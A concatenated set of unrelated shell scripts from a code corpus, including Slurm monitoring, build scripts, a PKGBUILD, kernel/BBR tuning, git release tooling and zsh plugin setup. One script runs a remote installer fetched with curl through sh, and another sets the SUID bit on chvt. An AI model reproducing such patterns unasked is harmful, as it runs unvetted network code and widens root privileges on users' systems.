ls -1 -d $PLUGIN_PATH/*/
;;
plugins-install)
pluginhook install
;;
plugins-install-dependencies)
pluginhook dependencies
;;
plugins-update)
pluginhook update
;;
# DEPRECATED as of v0.3.14
deploy:all)
echo "*DEPRECATED* in v0.3.14: deploy:all will be removed in future versions"
dokku ps:restartall
;;
help|'')
echo "Usage: dokku [--quiet|--trace|--rm-container|--rm|--force] COMMAND <app> [command-specific-options]"
echo ""
echo "Options:"
cat<<EOF | pluginhook commands help | sort
help Print the list of commands
plugins Print active plugins
plugins-install Install active plugins
plugins-update Update active plugins
EOF
;;
*)
implemented=0
for script in $PLUGIN_PATH/*/commands; do
set +e; $script "$@" ; exit_code=$? ; set -e
if [ "$exit_code" -eq "$DOKKU_NOT_IMPLEMENTED_EXIT" ]; then
continue
fi
implemented=1
if [ "$exit_code" -ne "$DOKKU_VALID_EXIT" ]; then
exit $exit_code
fi
done
if [ "$implemented" -eq 0 ]; then
dokku_log_warn "\`$*\` is not a dokku command."
dokku_log_warn "See \`dokku help\` for a list of available commands."
exit 1
fi
;;
esac
| true
|
022de872e50bfda986176b8c5408bb9f2452b090
|
Shell
|
ishan747/Jetstream_Elastic_Slurm
|
/cron-node-check.sh
|
UTF-8
| 1,237
| 3.234375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Cron health check for an elastic Slurm cluster: email when nodes are in a
# drained/down state, and when ACTIVE OpenStack compute instances exist with
# no running (R/CF/CG) jobs.

sinfo_check=$(sinfo | grep -iE "drain|down")
#mail_domain=$(curl -s https://ipinfo.io/hostname)
# Resolve this host's public name via reverse DNS of the EC2-style metadata IP.
mail_domain=$(host $(curl -s http://169.254.169.254/latest/meta-data/public-ipv4) | sed 's/.*pointer \(.*\)./\1/')
email_addr=""

# Retry resolving the mail domain (reverse DNS can lag right after boot);
# give up after 10 attempts.
try_count=0
declare -i try_count
until [[ -n $mail_domain || $try_count -ge 10 ]];
do
  sleep 3
  mail_domain=$(curl -s https://ipinfo.io/hostname)
  try_count=$try_count+1
  echo $mail_domain, $try_count
done

if [[ $try_count -ge 10 ]]; then
  echo "failed to get domain name!"
  exit 1
fi

if [[ -n $sinfo_check ]]; then
  echo $sinfo_check | mailx -r "node-check@$mail_domain" -s "NODE IN BAD STATE - $mail_domain" $email_addr
# echo "$sinfo_check mailx -r "node-check@$mail_domain" -s "NODE IN BAD STATE - $mail_domain" $email_addr" # TESTING LINE
fi

#Check for ACTIVE nodes without running/cf/cg jobs
squeue_check=$(squeue -h -t CF,CG,R)
# BUG FIX: this used to be '$(sudo cat /etc/slurm/openrc.sh)', which executes
# the file's *contents* as a command name instead of loading its variables
# into this shell; source it via process substitution instead.
source <(sudo cat /etc/slurm/openrc.sh)
compute_node_check=$(openstack server list | awk '/compute/ && /ACTIVE/')
if [[ -n $compute_node_check && -z $squeue_check ]]; then
  echo $compute_node_check $squeue_check | mailx -r "node-check@$mail_domain" -s "NODE IN ACTIVE STATE WITHOUT JOBS- $mail_domain" $email_addr
fi
| true
|
a26637aa5f7bfa83ac6319b998a02239c20abceb
|
Shell
|
MalvinJazz/fantastic-chainsaw
|
/www/json/motivos/demon.sh
|
UTF-8
| 469
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
# Download the per-motive complaint JSON feeds and strip metadata fields.
# (Shebang changed to bash so 'echo -e' reliably interprets escapes.)
clear
for motivo in "CR" "MU" "MA" "DH"
do
  echo -e "\e[31mDescargando archivo $motivo\e[0m"
  # BUG FIX: the download was piped into an "sh" command ('| "sh"'), which
  # served no purpose; wget already writes the payload to the -O file.
  wget -O "$motivo.sindepurar.json" "https://www.denunciappguatemala.com/denuncias/api/d1/motivo?tipo=$motivo"
  echo -e "\e[1;32mDepurando archivo $motivo\e[0m"
  # Drop "meta" objects, "cantidad" counts and empty "resource_uri" fields.
  perl -p -e 's/("meta"): {(\n|[^}])*},|"cantidad": \d*,|"resource_uri": "", / /g' "$motivo.sindepurar.json" > "$motivo.json"
  rm "$motivo.sindepurar.json"
done
| true
|
607705d0d3a3a78efdd27bbe59e8c5ac3fa2afe6
|
Shell
|
AlexanderMattheis/linux-enhancement-scripts
|
/src/services_lister.sh
|
UTF-8
| 357
| 3.1875
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/bash
# Write the names of all currently running services, one per line, to
# ServicesLister.out.

readonly OUTPUT_NAME="ServicesLister.out"

# 'service --status-all' marks running services with "[ + ]".  Keep only the
# marked entries, then strip the marker and all remaining spaces so just the
# service name is left.
service --status-all \
  | grep --only-matching " \[ + \] [A-Za-z0-9\_\-]*" \
  | sed 's/\[ + \]//g; s/ //g' > $OUTPUT_NAME
| true
|
385c747ecdfd6c75e5ffa79e48b0aa1fd736807a
|
Shell
|
petronny/aur3-mirror
|
/uqm-new/PKGBUILD
|
UTF-8
| 1,863
| 2.53125
| 3
|
[] |
no_license
|
# Quick note: Nearly all of the stuff in here is from the official uqm package.
#             The things changed is the version, the conflicts/provides, the
#             package name and adding a menu icon.
# uqm package
# Maintainer : Daenyth <Daenyth+Arch _AT_ gmail _DOT_ com>
# Contributor : wizzomafizzo <wizzomafizzo@gmail.com>
# Contributor: tochiro@no.spam.mail.berlios.de
# Contributor: sh__
# uqm-new
# Maintainer : Jookia <166291@gmail.com.spam>

# Arch Linux PKGBUILD: package metadata consumed by makepkg.
pkgname=uqm-new
pkgver=0.7.0
pkgrel=1
pkgdesc="The Ur-Quan Masters is a port of Star Control 2"
arch=(i686 x86_64)
url="http://sc2.sf.net/"
license=('GPL')
depends=('libmikmod' 'libvorbis' 'sdl_image' 'libgl')
makedepends=('imagemagick')
optdepends=('uqm-sound: For extra music and conversation audio')
# Replaces the official 'uqm' package.
conflicts=('uqm')
provides=('uqm')
source=(http://downloads.sourceforge.net/sourceforge/sc2/uqm-${pkgver}-source.tgz
        http://downloads.sourceforge.net/sourceforge/sc2/uqm-0.7.0-content.uqm
        config.state uqm uqm.desktop uqm.png)
md5sums=('f9018ea0493d7dac6a9e1006b00af7df' '2f36dcb15274dbbcb5e266f2ed84d5b2'
         '07f0a0e74a0b1c706940cc43d5a4160c' '07e64632fce6323a14ab558d0214b885'
         '771272cd2e4073db593f4dff14aea582' '57b7d8f10a05431eb7aa3d75724b43b9')

# makepkg build step: $srcdir/$pkgdir are provided by makepkg.
build() {
  cd $srcdir/uqm-$pkgver
  # Point the pre-answered config at this build's install prefix.
  cp $srcdir/config.state .
  sed -e "/INPUT_install_prefix/ s|replaceme|$pkgdir/usr|" \
    -i config.state
  # Non-interactive configure (the leading 'echo' feeds a newline), then build
  # and install into $pkgdir.
  echo | ./build.sh uqm config || return 1
  ./build.sh uqm || return 1
  ./build.sh uqm install
  # Ship the game content archive alongside the binaries.
  install -Dm644 $srcdir/uqm-0.7.0-content.uqm \
    $pkgdir/usr/share/uqm/content/packages/uqm-0.7.0-content.uqm
  # Replace the generated launcher script with our own wrapper.
  rm $pkgdir/usr/bin/uqm
  install -Dm755 $srcdir/uqm $pkgdir/usr/bin/uqm
  # Desktop launcher with icon
  install -D -m644 "${srcdir}/uqm.desktop" "${pkgdir}/usr/share/applications/uqm.desktop"
  install -D -m644 "${srcdir}/uqm.png" "${pkgdir}/usr/share/pixmaps/uqm.png"
}
# vim:set ts=2 sw=2 et:
| true
|
c2118725785d190496d30c550b74597e4ec2fbe0
|
Shell
|
gmlymayday/interpret
|
/build.sh
|
UTF-8
| 16,110
| 3.421875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Build script for the ebmcore native library.
#   - Darwin: builds release and debug x64 dylibs with clang++
#   - Linux : builds release and debug x64 .so files with g++
#     (cross compiling for x86 would require: sudo apt-get install g++-multilib)
# Built libraries are copied into src/python/interpret/lib and staging/.
#
# REFACTOR NOTE: the original script repeated the mkdir/compile/log/copy
# sequence verbatim for every configuration (plus large commented-out 32-bit
# variants); that sequence now lives in the helper functions below.  A 32-bit
# build can be added back by introducing an architecture parameter.

clang_pp_bin=clang++
g_pp_bin=g++
os_type=`uname`
script_path="`dirname \"$0\"`"

# Exit the whole script if the previous step failed.  $1 = exit code to check.
check_error() {
   if [ $1 -ne 0 ]; then
      exit $1
   fi
}

# Create a directory (and its parents) if it does not exist yet.  $1 = path.
make_dir() {
   [ -d "$1" ] || mkdir -p "$1"
   check_error $?
}

# Copy a built library to the python package and the staging area.  $1 = path.
publish_lib() {
   cp "$1" "$script_path/src/python/interpret/lib/"
   check_error $?
   cp "$1" "$script_path/staging/"
   check_error $?
}

# Build one macOS x64 configuration with clang++.
#   $1 = config (release|debug)
#   $2 = extra compiler flags ("-DNDEBUG" for release, "" for debug)
#   $3 = output library file name
build_mac() {
   echo "Compiling with $clang_pp_bin for $os_type $1|x64"
   intermediate_dir="$script_path/tmp/clang/intermediate/$1/mac/x64/ebmcore"
   bin_dir="$script_path/tmp/clang/bin/$1/mac/x64/ebmcore"
   make_dir "$intermediate_dir"
   make_dir "$bin_dir"
   compile_out=`$clang_pp_bin "$script_path/src/core/ebmcore/DataSetByAttribute.cpp" "$script_path/src/core/ebmcore/DataSetByAttributeCombination.cpp" "$script_path/src/core/ebmcore/InteractionDetection.cpp" "$script_path/src/core/ebmcore/Logging.cpp" "$script_path/src/core/ebmcore/SamplingWithReplacement.cpp" "$script_path/src/core/ebmcore/Training.cpp" -I"$script_path/src/core/ebmcore" -I"$script_path/src/core/inc" -std=c++11 -fpermissive -fvisibility=hidden -fvisibility-inlines-hidden -O3 -march=core2 -DEBMCORE_EXPORTS -fpic -dynamiclib -m64 $2 -install_name "@rpath/$3" -o "$bin_dir/$3" 2>&1`
   ret_code=$?
   echo -n "$compile_out"
   # Keep a per-configuration copy of the compiler output for debugging.
   echo -n "$compile_out" > "$intermediate_dir/ebmcore_$1_mac_x64_build_log.txt"
   check_error $ret_code
   publish_lib "$bin_dir/$3"
}

# Build one Linux x64 configuration with g++.
#   $1 = config (release|debug)
#   $2 = extra compiler flags ("-DNDEBUG" for release, "" for debug)
#   $3 = output library file name
build_linux() {
   echo "Compiling with $g_pp_bin for $os_type $1|x64"
   intermediate_dir="$script_path/tmp/gcc/intermediate/$1/linux/x64/ebmcore"
   bin_dir="$script_path/tmp/gcc/bin/$1/linux/x64/ebmcore"
   make_dir "$intermediate_dir"
   make_dir "$bin_dir"
   compile_out=`$g_pp_bin "$script_path/src/core/ebmcore/DataSetByAttribute.cpp" "$script_path/src/core/ebmcore/DataSetByAttributeCombination.cpp" "$script_path/src/core/ebmcore/InteractionDetection.cpp" "$script_path/src/core/ebmcore/Logging.cpp" "$script_path/src/core/ebmcore/SamplingWithReplacement.cpp" "$script_path/src/core/ebmcore/Training.cpp" -I"$script_path/src/core/ebmcore" -I"$script_path/src/core/inc" -std=c++11 -fpermissive -fvisibility=hidden -fvisibility-inlines-hidden -O3 -march=core2 -DEBMCORE_EXPORTS -fpic -Wl,--version-script="$script_path/src/core/ebmcore/EbmCoreExports.txt" -Wl,--exclude-libs,ALL -Wl,--wrap=memcpy "$script_path/src/core/ebmcore/WrapFunc.cpp" -static-libgcc -static-libstdc++ -shared -m64 $2 -o "$bin_dir/$3" 2>&1`
   ret_code=$?
   echo -n "$compile_out"
   # Keep a per-configuration copy of the compiler output for debugging.
   echo -n "$compile_out" > "$intermediate_dir/ebmcore_$1_linux_x64_build_log.txt"
   check_error $ret_code
   publish_lib "$bin_dir/$3"
}

if [ "$os_type" = "Darwin" ]; then
   echo "Creating initial directories"
   make_dir "$script_path/staging"
   make_dir "$script_path/src/python/interpret/lib"
   build_mac release -DNDEBUG ebmcore_mac_x64.dylib
   build_mac debug "" ebmcore_mac_x64_debug.dylib
elif [ "$os_type" = "Linux" ]; then
   echo "Creating initial directories"
   make_dir "$script_path/staging"
   make_dir "$script_path/src/python/interpret/lib"
   build_linux release -DNDEBUG ebmcore_linux_x64.so
   build_linux debug "" ebmcore_linux_x64_debug.so
else
   echo "OS $os_type not recognized.  We support $clang_pp_bin on Darwin and $g_pp_bin on Linux"
   exit 1
fi
| true
|
264515e3328269515d842e665e3d563bd831f53c
|
Shell
|
learningendless/doubi
|
/bbr7.sh
|
UTF-8
| 1,771
| 3.109375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
#=================================================
#	System Required: CentOS/RHEL 7 (the script uses rpm/yum and the
#	                 ELRepo el7 kernel repo — not Debian/Ubuntu as the
#	                 header previously claimed)
#	Description: TCP-BBR
#	Version: 1.0.22
#	Author: hombo125
#	Blog: https://github.com/hombo125
#=================================================
echo "Running system optimization and enable Google BBR..."
# Install the ELRepo mainline kernel (BBR needs kernel >= 4.9).
rpm --import https://www.elrepo.org/RPM-GPG-KEY-elrepo.org
rpm -Uvh http://www.elrepo.org/elrepo-release-7.0-3.el7.elrepo.noarch.rpm
yum remove kernel-headers -y
yum --enablerepo=elrepo-kernel install kernel-ml kernel-ml-headers -y
# Boot the newly installed kernel by default.
grub2-set-default 0
# Load the BBR congestion-control module at boot.
echo "tcp_bbr" >> /etc/modules-load.d/modules.conf
# Raise open-file limits.  NOTE(review): these appends run unconditionally, so
# re-running the script duplicates entries in limits.conf and sysctl.conf.
cat >> /etc/security/limits.conf << EOF
* soft nofile 51200
* hard nofile 51200
EOF
ulimit -n 51200
# Network tuning plus fq qdisc + BBR congestion control.
cat >> /etc/sysctl.conf << EOF
fs.file-max = 51200
net.core.default_qdisc = fq
net.core.rmem_max = 67108864
net.core.wmem_max = 67108864
net.core.netdev_max_backlog = 250000
net.core.somaxconn = 4096
net.ipv4.tcp_congestion_control = bbr
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_tw_reuse = 1
net.ipv4.tcp_fin_timeout = 30
net.ipv4.tcp_keepalive_time = 1200
net.ipv4.ip_local_port_range = 10000 65000
net.ipv4.tcp_max_syn_backlog = 8192
net.ipv4.tcp_max_tw_buckets = 5000
net.ipv4.tcp_fastopen = 3
net.ipv4.tcp_rmem = 4096 87380 67108864
net.ipv4.tcp_wmem = 4096 65536 67108864
net.ipv4.tcp_mtu_probing = 1
EOF
sysctl -p
# Ask before rebooting into the new kernel.
echo "System require a reboot to complete the installation process, press Y to continue, or press any key else to exit this script."
read is_reboot
if [[ ${is_reboot} == "y" || ${is_reboot} == "Y" ]]; then
reboot
else
# NOTE(review): ${green}/${plain} are never defined in this script, so they
# expand to empty strings here.
echo -e "${green}Info:${plain} Reboot has been canceled..."
exit 0
fi
| true
|
43c837b2c753c59449ed3a244cf4c87186c8dc7f
|
Shell
|
NishuGoel/component-libr
|
/lib/cli/test/run_tests.sh
|
UTF-8
| 1,170
| 3.921875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# exit on error
set -e
declare test_root=$PWD
# remove run directory before exit to prevent yarn.lock spoiling
function cleanup {
rm -rfd ${test_root}/run
}
trap cleanup EXIT
fixtures_dir='fixtures'
# parse command-line options
# '-f' sets fixtures directory
while getopts ":f:" opt; do
case $opt in
f)
fixtures_dir=$OPTARG
;;
esac
done
# copy all files from fixtures directory to `run`
rm -rfd run
cp -r $fixtures_dir run
cd run
for dir in *
do
cd $dir
echo "Running storybook-cli in $dir"
if [ $dir == *"native"* ]
then
# run @storybook/cli
../../../bin/index.js init --skip-install --yes --install-server
else
# run @storybook/cli
../../../bin/index.js init --skip-install --yes
fi
cd ..
done
cd ..
# install all the dependencies in a single run
cd ../../..
echo "Running bootstrap"
yarn install --non-interactive --silent --pure-lockfile
cd ${test_root}/run
for dir in *
do
# check that storybook starts without errors
cd $dir
echo "Running smoke test in $dir"
failed=0
yarn storybook --smoke-test --quiet || failed=1
if [ $failed -eq 1 ]
then
exit 1
fi
cd ..
done
| true
|
7e5caa03e4c803edd1f8fd8dee8a68151b6d56ae
|
Shell
|
PonteIneptique/docview
|
/etc/docview-init
|
UTF-8
| 778
| 3.28125
| 3
|
[] |
no_license
|
#! /bin/sh
# description: Docview Start Stop Restart
# chkconfig: 234 20 80
#JAVA_HOME=/usr/java/jdk1.7.0_05
JAVA_HOME=/usr/lib/jvm/jre-1.6.0-sun.x86_64
export JAVA_HOME
PATH=$JAVA_HOME/bin:$PATH
export PATH
export USER=docview
APP="docview"
APP_PATH="/opt/webapps/$APP"
CONF=$APP_PATH/conf/prod.conf
start() {
cd $APP_PATH
su $USER -c "$APP_PATH/target/start -DapplyEvolutions.default=true -Dhttp.port=9000 -Dconfig.file=$CONF &"
}
stop() {
kill `cat $APP_PATH/RUNNING_PID`
}
case "$1" in
start)
echo "Starting $APP"
start
echo "$APP started."
;;
stop)
echo "Stopping $APP"
stop
echo "$APP stopped."
;;
restart)
echo "Restarting $APP."
stop
sleep 2
start
echo "$APP restarted."
;;
*)
N=/etc/init.d/$APP
echo "Usage: $N {start|stop|restart}" >&2
exit 1
;;
esac
exit 0
| true
|
e9726b3b8c88b7e58d9b59bab4c47a52639b376c
|
Shell
|
Jimmy-Xu/docker-hub-stat
|
/list_repo/run.sh
|
UTF-8
| 1,313
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
# list repo by namespace with list_repo.sh
WORKER_CNT=50
SRC_BASE="../search_repo/process_result"
function show_usage(){
cat <<EOF
usage: ./run.sh <dir_name>
<dir_name>: sub_dir under ./result
eg: ./run.sh 20160111
-----------------------
[available]:
EOF
ls ${SRC_BASE}
exit 1
}
#check parameter
if [ $# -ne 1 ];then
echo "parameter error!"
show_usage
fi
#check input parameter
SRC_DIR="${SRC_BASE}/$1/"
USER_LIST="${SRC_DIR}/user.txt"
NAMESPACE_LIST="etc/namespace.txt"
if [ ! -d ${SRC_DIR} ];then
echo "${SRC_DIR} not found!"
show_usage
else
if [ ! -s ${USER_LIST} ];then
echo "${USER_LIST} is not exist or is empty"
show_usage
fi
fi
#generate ${NAMESPACE_LIST}
cat etc/official.txt ${USER_LIST} > ${NAMESPACE_LIST}
#start
total=$(cat ${NAMESPACE_LIST}|wc -l)
OUT_BASE="./list_result/$1"
while read NAMESPACE
do
echo "==== [ ${total} ] ${NAMESPACE} ===="
p_cnt=$(ps -ef |grep "list_repo.sh" | grep -v grep | wc -l)
while [ ${p_cnt} -ge ${WORKER_CNT} ]
do
sleep 5
p_cnt=$(ps -ef |grep "list_repo.sh" | grep -v grep | wc -l)
done
OUT_DIR="${OUT_BASE}/${NAMESPACE}"
if [ ! -f ${OUT_DIR}/end ];then
#not fetched
./list_repo.sh $1 ${NAMESPACE} ${total} &
#sleep 0.5
fi
total=$((total-1))
done < ${NAMESPACE_LIST}
echo "All Done"
| true
|
d7f46c4a87a4037135f833f030644f4b0b175b17
|
Shell
|
zablonbaraka85/cs6340
|
/Assignment6/constraints/checker
|
UTF-8
| 975
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
if (( $# < 2 )); then
echo "usage: $0 modref|escape TESTCASE"
exit 1
fi
test ! -d "examples/$2" && echo "unknown example $2">&2 && exit 1
case "$1" in
modref)
echo "[+] Note: < is from reference but not yours, > is in yours but not reference"
echo "[+] modInstField"
diff sample_output/$2/modInstField.txt examples/$2/chord_output/modInstField.txt
echo "[+] refInstField"
diff sample_output/$2/refInstField.txt examples/$2/chord_output/refInstField.txt
echo "[+] refStatField"
diff sample_output/$2/refStatField.txt examples/$2/chord_output/refStatField.txt
echo "[+] modStatField"
diff sample_output/$2/modStatField.txt examples/$2/chord_output/modStatField.txt
;;
escape)
echo "[+] Note: < is from reference but not yours, > is in yours but not reference"
echo "[+] localMH"
diff sample_output/$2/localMH.txt examples/$2/chord_output/localMH.txt
;;
*) echo "unknown analysis $1" >&2
;;
esac
| true
|
f6b511405df8ca476761b52127a682f7b17b1853
|
Shell
|
overo/overo-oe-natty
|
/recipes/keylaunch/keylaunch-conf/80chvt-SUID
|
UTF-8
| 600
| 3.4375
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/sh
#
# Copyright Matthias Hentges <devel@hentges.net> (c) 2006
# License: GPL (see http://www.gnu.org/licenses/gpl.txt for a copy of the license)
#
# Filename: chvt-SUID.sh
# Date: 28-May-06
#
# Sets the SUID bit on chvt to allow changing to the VT from inside X by
# any user. Since a SUID binary still is a security risk, we chmod only
# when keylaunch is used and not by default.
#
for target in /usr/bin/chvt.console-tools
do
if test "`ls -l "$target" | awk '{print $1}'|cut -c 2-4`" != "rws"
then
echo "Making [$target] SUID root..."
chmod u+s "$target"
else
echo "Ignoring [$target]"
fi
done
| true
|
a1e2c28cdb113ba75c1d31252946a503fe5475e0
|
Shell
|
gyzhangqm/CFDWARP
|
/tools/gitnewversion_public.sh
|
UTF-8
| 4,129
| 3.9375
| 4
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
filecheck=".makefile-header-default"
warppublic="../warp_public"
tmpfile="UHFGHnhKJLJGHGGHKJkljk_tmpfile_from_gitnewversion_public.txt"
command -v git >/dev/null 2>&1 || { echo "ERROR: gitnewversion_public.sh requires git but it is not installed. Aborting." >&2; exit 1; }
if [ -f "$filecheck" ]; then
echo "Checking that the current directory is the warp main directory. [OK]";
else
echo "ERROR: gitnewversion_public.sh must be run from the warp main directory. Exiting.";
exit 1
fi
if [ $# -eq 1 ]; then
echo "Checking arguments: $1 specified as new version to commit. [OK]";
else
echo "ERROR: gitnewversion_public.sh needs one argument: the new version string. Exiting.";
exit 1
fi
if [ -n "$(git show-ref --tags $1)" ]; then
echo "Checking that version $1 is found on main warp git. [OK]";
else
echo "ERROR: version $1 not yet committed. Please commit version $1 to private warp before committing it to the public warp." ;
exit 1
fi
latesttag=$(git describe --tags `git rev-list --tags --max-count=1`);
if [ "$1" = "$latesttag" ]; then
echo "Checking that the latest tag is $1 on the main warp git. [OK]";
else
echo "ERROR: The tag given $1 is not set to the latest tag $latesttag on the main warp git. Exiting.";
exit 1
fi
if [ -n "$(git status --porcelain)" ]; then
echo "ERROR: Changes or untracked files reported by git on main warp. Please commit changes to the private warp before committing them to the public warp.";
exit 1
else
echo "Checking that there is no changes or untracked files reported by git on main warp. [OK]";
fi
if [ -d "$warppublic" ]; then
echo "Checking that the $warppublic directory exists. [OK]";
else
echo "The directory $warppublic does not exist. Cloning it from github.";
git clone https://bernardparent@github.com/bernardparent/CFDWARP "$warppublic"
if [ -d "$warppublic" ]; then
echo "Checking that the $warppublic directory has been created properly by git. [OK]";
else
echo "ERROR: The directory $warppublic does not exist. Exiting.";
exit 1
fi
fi
touch "$warppublic/$tmpfile"
if [ -f "$tmpfile" ]; then
echo "ERROR: The current directory is $warppublic, and not the main warp directory. Exiting.";
rm -f "$warppublic/$tmpfile"
exit 1
else
echo "Checking that the current directory is not $warppublic. [OK]";
rm -f "$warppublic/$tmpfile"
fi
if [ -d "$warppublic/.git" ]; then
echo "Checking that the $warppublic/.git directory exists. [OK]";
else
echo "ERROR: The directory $warppublic/.git does not exist. Exiting.";
exit 1
fi
echo "Pulling latest public warp from github..";
rm -rf "$warppublic"/*
cd $warppublic
git checkout master
git reset --hard
git pull --tags origin master
if [ -n "$(git status --porcelain)" ]; then
echo "ERROR: Changes or untracked files reported by git on $warppublic. Can not proceed. Exiting.";
exit 1
#echo "Changes or untracked files on $warppublic. This may not be a source of concern."
else
echo "Checking that there is no changes or untracked files reported by git on $warppublic. [OK]";
fi
cd -
rm -rf "$warppublic"/*
rm -f "$warppublic"/.*
cp -a * "$warppublic"
cp .* "$warppublic"
cd "$warppublic"
cd config
chmod u+x removeproprietary.sh
./removeproprietary.sh
chmod u-x removeproprietary.sh
cd ..
echo ' '
echo 'Calling git status to check what changes will be pushed..'
echo ' '
git status
echo ' '
echo -n "Add these changes in new version $1 on PUBLIC GITHUB? (y/N)"
read answer
if [ "$answer" != "${answer#[Yy]}" ] ;then
echo Yes
else
echo No
exit 1
fi
if [ -f "$filecheck" ]; then
if git show-ref --tags $1 ; then
echo ERROR: Version $1 already committed. Exiting.
exit 1
fi
if git ls-remote --exit-code --tags origin $1 ; then
echo ERROR: Version $1 already committed on github. Exiting.
exit 1
fi
echo 'Committing and pushing files to github..'
git add -A .
git commit -a -m "$1"
git tag -d $1 > /dev/null 2>&1
git tag -a $1 -m "$1"
git push --tags origin master
else
echo "ERROR: couldn't find $filecheck in $warppublic directory. Exiting."
exit 1
fi
echo '[done]'
| true
|
ff7447a102f33b1002b2d53c958d85f8ade69c81
|
Shell
|
hoodielive/dconf-nfs
|
/2-test.sh
|
UTF-8
| 1,065
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/bash
# Initial test
# 1. Make a list of all the users that do not have a .config/dconf file instance
for users in $(cat /var/tmp/users); do
dconf=/home/$users/.config/dconf
if [ -d "${dconf}" ]; then
echo "$users" >> /var/tmp/with_dconf_file.txt
else
echo "$users" >> /var/tmp/without_dconf_file.txt
fi
done
# 2. Make sure none of these users get added to the /var/tmp/users list.
# Secondary tests
# 1. Make sure that 'user.txt' is not found
for users in $(cat /var/tmp/with_dconf_file.txt); do
if [ -f "/home/${users}/.config/dconf/user.txt" ]; then
echo "${users}" >> /var/tmp/user_bypass.txt
else
echo "${users}" >> /var/tmp/operation_on_users.txt
fi
done
# 2. If user.txt is found - skip
# 3. if user.txt is not found, is user file found? if not, skip, else become user and perform operation
# 4. test if operation was successful, if it was rm dconf-temp-profile and log it to a file in /var/tmp
# 5. If successful remove of dconf-temporary-profile - cd to next users dir
| true
|
b26dbb4d209c719f475fdab9b4f4850f154a3e7a
|
Shell
|
wang-shun/groundwork-trunk
|
/groundwork-monitor-os/build/master-build.sh
|
UTF-8
| 1,634
| 2.71875
| 3
|
[] |
no_license
|
#!/bin/bash
# description: monitor-core build script
# GroundWork Monitor - The ultimate data integration framework.
# Copyright 2007 GroundWork Open Source, Inc. "GroundWork"
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of version 2 of the GNU General Public License
# as published by the Free Software Foundation and reprinted below;
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
BASE=$PWD/..
BUILD_DIR=$BASE/build
. checkEnv.sh
cd $BUILD_DIR
. checkEnv.sh
. downloadSources.sh
cd $BUILD_DIR
. buildBaseComponents.sh
BUILD_DIR=$BASE/build
cd $BUILD_DIR
. buildCore.sh
rm -rf /usr/local/groundwork/foundation*
#Build Monitor Pro RPM
cd $BASE
maven allBuild
maven allDeploy
find /usr/local/groundwork -name .svn -exec rm -rf {} \;
find /usr/local/groundwork -name .project -exec rm -rf {} \;
find /usr/local/groundwork -name maven.xml -exec rm -rf {} \;
find /usr/local/groundwork -name project.xml -exec rm -rf {} \;
cd $BUILD_DIR
. set-permissions.sh
cd /usr/local/groundwork
$BUILD_DIR/rpm-filelist.pl > /usr/local/core-filelist
cd $BASE/monitor-os/spec/
chmod +x buildRPM.sh
. buildRPM.sh
cd $BUILD_DIR/../build
. checkBuild.sh
| true
|
f585af020bc9771fcb85a0ae4501b2621d4fb79c
|
Shell
|
ops-class/sys161
|
/mipseb/tests/checkbin.sh
|
UTF-8
| 704
| 3.5
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
#
# checkbin.sh - check a mips binary for having exception handlers in the
# right place.
#
# Usage: checkbin.sh files
#
# Assumes the exception handlers are called "utlbexn" and "genexn".
# This will only fail if these symbols are present but in the wrong place.
#
mips-harvard-os161-nm -o "$@" | egrep ' utlbexn$| genexn$' |\
sed '
/^[^:]*:80000000 [Tt] utlbexn$/d
/^[^:]*:80000080 [Tt] genexn$/d
/^[^:]*:ffffffff80000000 [Tt] utlbexn$/d
/^[^:]*:ffffffff80000080 [Tt] genexn$/d
' |\
sed 's/:.*//' | awk '
{ f[++n] = $1 }
END {
if (n>0) {
printf "Failing files:\n" >"/dev/stderr";
for (i=1;i<=n;i++) {
print f[i];
}
exit(1);
}
}
' || exit 1
| true
|
4224d5b810d3506bf3a3b1a37a471ffc49b83a03
|
Shell
|
bjzq/adrv9009_fmcomms8_sync_test_bash
|
/dmesg_status.sh
|
UTF-8
| 193
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
file="log_dmesg.txt"
test=$(($1/3))
echo >>$file
echo >>$file
echo "test_nr: $test sample_nr: $1">>$file
echo >>$file
echo "***dmesg:">>$file
dmesg |tail -20 |grep -v axi>>$file
| true
|
cae244148ebaa1e69a5d7c39de907fa414a65886
|
Shell
|
AlexeyMK/.files
|
/zsh/plugins.zsh
|
UTF-8
| 4,141
| 2.71875
| 3
|
[] |
no_license
|
# this file uses `zplugin` to manage `zsh` plugins
#
# refs:
# - http://zdharma.org/zplugin/wiki/INTRODUCTION/
# - https://github.com/zdharma/zplugin#zplugin-wiki
# install `zplugin` if not already installed
# ref - https://github.com/zdharma/zplugin
if ! [ -d "$HOME/.zplugin" ]; then
sh -c "$(curl -fsSL https://raw.githubusercontent.com/zdharma/zplugin/master/doc/install.sh)"
fi
# <<<<<<<<<<<<<<<<<<< start of zplugin installer-added chunk >>>>>>>>>>>>>>>>>>>
source "$HOME/.zplugin/bin/zplugin.zsh"
autoload -Uz _zplugin
(( ${+_comps} )) && _comps[zplugin]=_zplugin
# <<<<<<<<<<<<<<<<<<< start of zplugin installer-added chunk >>>>>>>>>>>>>>>>>>>
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<< start of plugins >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# `zplugin` has a concept called ice modifiers which applies single-use
# modifiers to the next loaded plugin.
#
# the `ice` name communicates that the modifiers last for only the next zplugin
# command
#
# here are the modifiers used in this file:
#
# - wait - load asynchronously
